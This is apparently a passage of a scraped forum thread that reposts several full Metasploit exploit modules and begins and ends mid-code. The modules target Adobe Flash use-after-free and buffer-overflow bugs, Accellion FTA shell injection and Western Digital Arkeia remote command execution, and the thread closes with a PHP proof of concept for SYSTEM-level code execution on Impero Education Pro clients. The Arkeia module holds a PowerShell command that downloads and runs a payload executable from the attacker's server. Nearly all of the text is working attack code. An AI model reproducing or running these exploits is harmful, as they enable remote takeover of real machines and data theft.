name=\"SUBMIT\"\r\n\r\n" data << " Change password\r\n" data << "--#{boundary}--\r\n" refererUrl = "https://#{datastore['RHOST']}:#{datastore['RPORT']}" + "#{datastore['TARGETURI']}" send_request_cgi( { 'method' => 'POST', 'uri' => datastore['TARGETURI'], 'ctype' => "multipart/form-data; boundary=#{boundary}", 'headers' => { 'Referer' => refererUrl }, 'data' => data }, datastore['TIMEOUT']) end end
  20. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player ByteArray Use After Free', 'Description' => %q{ This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows XP, Chrome 43 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Someone from HackingTeam 'juan vazquez' # msf module ], 'References' => [ ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'], ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 || os =~ OperatingSystems::Match::WINDOWS_VISTA || os =~ OperatingSystems::Match::WINDOWS_XP end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' # Note: Chrome might be vague about the version. # Instead of 18.0.0.203, it just says 18.0 return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jul 06 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end
  21. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-3043'], ['CVE', '2015-3113'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'], ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'], ['URL', 'http://bobao.360.cn/learning/detail/357.html'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161') return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 23 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf @flv = create_flv super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end if request.uri =~ /\.flv$/ print_status('Sending FLV...') send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end def create_flv header = '' header << 'FLV' # signature header << [1].pack('C') # version header << [4].pack('C') # Flags: TypeFlagsAudio header << [9].pack('N') # DataOffset data = '' data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0 data << "\xee" * 0x440 # SoundData tag1 = '' tag1 << [8].pack('C') # TagType (audio) tag1 << "\x00\x04\x41" # DataSize tag1 << "\x00\x00\x1a" # TimeStamp tag1 << [0].pack('C') # TimeStampExtended tag1 << "\x00\x00\x00" # StreamID, always 0 tag1 << data body = '' body << [0].pack('N') # PreviousTagSize body << tag1 body << [0xeeeeeeee].pack('N') # PreviousTagSize flv = '' flv << header flv << body flv end end
  22. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution', 'Description' => %q{ This module exploits a metacharacter shell injection vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'oauth_token' is passed into a system() call within a mod_perl handler. This module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on version FTA_9_11_200, but may apply to previous versions as well. This issue was fixed in software update FTA_9_11_210. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://r-7.co/R7-2015-08'], ['CVE', '2015-2857'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl bash telnet', } }, 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 10 2015' )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]) ], self.class) end def check uri = '/tws/getStatus' res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token' => 'invalid' }}) unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/ return Exploit::CheckCode::Safe end res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token' => "';echo '" }}) unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/ return Exploit::CheckCode::Safe end Msf::Exploit::CheckCode::Vulnerable end def exploit # The token is embedded into a command line the following: # `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`; token = "';#{payload.encoded};echo '" uri = '/tws/getStatus' # Other exploitable URLs: # * /seos/find.api (works with no other changes to this module) # * /seos/put.api (requires some hoop jumping, upload) # * /seos/mput.api (requires some hoop jumping, token && upload) print_status("Sending request for #{uri}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token' => token }}) if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/ print_status("Valid response received...") else if res print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}") else print_error("No reply received from the target") end end handler end end
  23. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash opaqueBackground Use After Free', 'Description' => %q{ This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as an Use After Free while handling the opaqueBackground property 7 setter of the flash.display.DisplayObject class. This module is an early release tested on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194, windows 8.1, Firefox and Adobe Flash 18.0.0.203, Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and Windows 8.1, Firefox and Adobe Flash 18.0.0.194 }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovered on HackingTeam info leak 'juan vazquez', # Ported to Msf 'sinn3r' # Testing and some editing ], 'References' => [ ['CVE', '2015-5122'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.203') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jul 06 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0' print_warning("Target setup not supported") send_not_found(cli) return end if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end
  24. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Western Digital Arkeia Remote Code Execution', 'Description' => %q{ This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below. The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are insufficient checks on the authentication of all clients, this can be bypassed. Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or SYSTEM privileges. The daemon is installed on both the Arkeia server as well on all the backup clients. The module has been successfully tested on Windows, Linux, OSX, FreeBSD and OpenBSD. }, 'Author' => [ 'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win', } ], [ 'Linux', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'DisableNops' => true, 'Space' => 60000, 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'perl python bash-tcp gawk openssl' } } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 10 2015')) register_options( [ Opt::RPORT(617), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]) ], self.class) end def check connect req = "\x00\x41" req << "\x00" * 5 req << "\x73" req << "\x00" * 12 req << "\xc0\xa8\x02\x74" req << "\x00" * 56 req << "\x74\x02\xa8\xc0" req << 'ARKADMIN' req << "\x00" req << 'root' req << "\x00" req << 'root' req << "\x00" * 3 req << '4.3.0-1' # version? req << "\x00" * 11 sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04" disconnect return Exploit::CheckCode::Unknown end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect return Exploit::CheckCode::Unknown end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect return Exploit::CheckCode::Unknown end req = "\x00\x73" req << "\x00" * 5 req << "\x0c\x32" req << "\x00" * 11 sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04" disconnect return Exploit::CheckCode::Unknown end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect return Exploit::CheckCode::Unknown end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect return Exploit::CheckCode::Unknown end req = "\x00\x61\x00\x04\x00\x01\x00\x11\x00\x00\x31\x00" req << 'EN' # Language req << "\x00" * 11 sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00" disconnect return Exploit::CheckCode::Unknown end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect return Exploit::CheckCode::Unknown end data_length = data_length.unpack('n')[0] unless data_length == 0 disconnect return Exploit::CheckCode::Unknown end # ARKADMIN_GET_CLIENT_INFO req = "\x00\x62\x00\x01" req << "\x00" * 3 req << "\x26" req << 'ARKADMIN_GET_CLIENT_INFO' # Function to request agent information req << "\x00\x32\x38" req << "\x00" * 11 sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00" disconnect return Exploit::CheckCode::Unknown end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect return Exploit::CheckCode::Unknown end data_length = data_length.unpack('n')[0] unless data_length == 0 disconnect return Exploit::CheckCode::Unknown end req = "\x00\x63\x00\x04\x00\x00\x00\x12\x30\x00\x31\x00\x32\x38" req << "\x00" * 12 sock.put(req) # 1st packet header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04" disconnect return Exploit::CheckCode::Unknown end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect return Exploit::CheckCode::Unknown end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect return Exploit::CheckCode::Unknown end # 2nd packet header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04" disconnect return Exploit::CheckCode::Unknown end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect return Exploit::CheckCode::Unknown end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect return Exploit::CheckCode::Unknown end # 3rd packet header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x65\x00\x04" disconnect return Exploit::CheckCode::Unknown end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect return Exploit::CheckCode::Unknown end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length && data.include?('You have successfully retrieved client information') disconnect return Exploit::CheckCode::Unknown end # 4th packet header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x69\x00\x04" disconnect return Exploit::CheckCode::Unknown end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect return Exploit::CheckCode::Unknown end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect return Exploit::CheckCode::Unknown end if data =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/ version = $1 vprint_status("#{rhost}:#{rport} - Arkeia version detected: #{version}") if Gem::Version.new(version) <= Gem::Version.new('11.0.12') return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end else vprint_status("#{rhost}:#{rport} - Arkeia version not detected") return Exploit::CheckCode::Unknown end end def exploit if target.name =~ /Windows/ @down_file = rand_text_alpha(8+rand(8)) @pl = generate_payload_exe begin Timeout.timeout(datastore['HTTP_DELAY']) {super} rescue Timeout::Error end elsif target.name =~ /Linux/ communicate(payload.encoded) return end end def primer @payload_url = get_uri # PowerShell web download. The char replacement is needed because using the "/" character twice (like http://) # is not possible on Windows agents. command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"#{@payload_url.gsub(/\//, '$($s)')}\\\";" command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');" command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\"" communicate(command) end def communicate(command) print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon") connect print_status("#{rhost}:#{rport} - Sending agent communication") req = "\x00\x41\x00\x00\x00\x00\x00\x70" req << "\x00" * 12 req << "\xc0\xa8\x02\x8a" req << "\x00" * 56 req << "\x8a\x02\xa8\xc0" req << 'ARKFS' req << "\x00" req << 'root' req << "\x00" req << 'root' req << "\x00" * 3 req << '4.3.0-1' # Client version ? req << "\x00" * 11 sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04" disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier") end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length") end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data") end req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32" req << "\x00" * 11 sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04" disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier") end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length") end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data") end req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00" req << rand_text_numeric(10) # "1234567890" - 10 byte numerical value, like a session ID? req << "\x00" req << 'EN' # English language? req << "\x00" * 11 sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00" disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier") end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length") end data_length = data_length.unpack('n')[0] unless data_length == 0 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read") end req = "\x00\x62\x00\x01\x00\x02\x00\x1b" req << 'ARKFS_EXEC_CMD' # With this function we can execute system commands with root/SYSTEM privileges req << "\x00\x31" req << "\x00" * 11 sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00" disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier") end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length") end data_length = data_length.unpack('n')[0] unless data_length == 0 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read") end req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c" req << "\x00" * 11 sock.put(req) command_length = '%02x' % command.length command_length = command_length.scan(/../).map { |x| x.hex.chr }.join req = "\x00\x64\x00\x04\x00\x04" req << [command.length].pack('n') req << command # Our command to be executed req << "\x00" print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD") sock.put(req) header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04" disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier") end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length") end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data") end # 1st Packet header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04" disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier") end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length") end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data") end # 2st Packet header = sock.get_once(6) unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04" disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier") end data_length = sock.get_once(2) unless data_length && data_length.length == 2 disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length") end data_length = data_length.unpack('n')[0] data = sock.get_once(data_length) unless data && data.length == data_length disconnect fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data") end end def on_request_uri(cli, request) print_status("Request: #{request.uri}") if request.uri == get_resource print_status('Sending payload...') send_response(cli, @pl) register_files_for_cleanup("c:\\#{@down_file}.exe") end end end
  25. mohammad_ghazei

    Hacking

    /* If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/ They recently were in the news about how they implemented "anti-radicalisation" shit or something. They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me. Some reversing later, looks like Impero is completely pwned amirite. The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used. After connection, a client must authenticate. This is done by sending "-1|AUTHENTICATE\x02PASSWORD". Not even joking here. "PASSWORD" is a seperate string though, so it might be different for some special clients maybe. No idea. Then, we have full range to do whatever we want. My PoC also does negotiatiation, but I'm not sure if that's needed. We can get a list of clients with the "SENDCLIENTS" command, then send all the IDs to "SENDCOMMANDMSG" (run CLI command as SYSTEM), or OPENFILE (run visibly an EXE under whatever user, including SYSTEM), or other protocol commands, etc. There's an OSX version, but I haven't properly looked into that. Run my PoC with the right args and it pops calc on every Windows client as SYSTEM. It also runs "whoami > c:\lol.txt", also as SYSTEM. This second one gets logged serverside, but the server logs it as "unknown" as it doesn't know what client did it. Basically, if you use Impero, please don't. Oh yeah -- free speech for the win... internet censorship is <insert some expletives here>, and so are any and all RATs. - slipstream / RoL^LHQ - @TheWack0lian PoC code follows. In PHP because lol. PoC works on at least 5.x (latest). */ <?php // Impero Education Pro SYSTEM-RCE PoC // by slipstream/RoL^LHQ // greets to everyone in lizardhq! :) function PadString($str) { $size = 16; $pad = $size - (strlen($str) % $size); $padstr = ''; for ($i = 1; $i < $pad; $i++) $padstr .= chr(mt_rand(0,255)); return $str.$padstr.chr($pad); } function UnPadString($str) { return substr($str,0,-(ord(substr($str,-1)))); } function CryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); $crypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,PadString($str),'cbc',$iv); return $crypted; } function DecryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); return UnPadString(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$key,$str,'cbc',$iv)); } function SendNetwork($h,$str) { global $socketid; $crypted = CryptString($socketid."|".$str); socket_write($h,strlen($crypted).'|'.$crypted); return; } function RecvNetwork($h) { $len = ''; $chr = ''; do { $len .= $chr; $chr = socket_read($h,1); } while ($chr != '|'); $len = (int)($len); if ($len < 1) die("Something's wrong. Length isn't an int."); 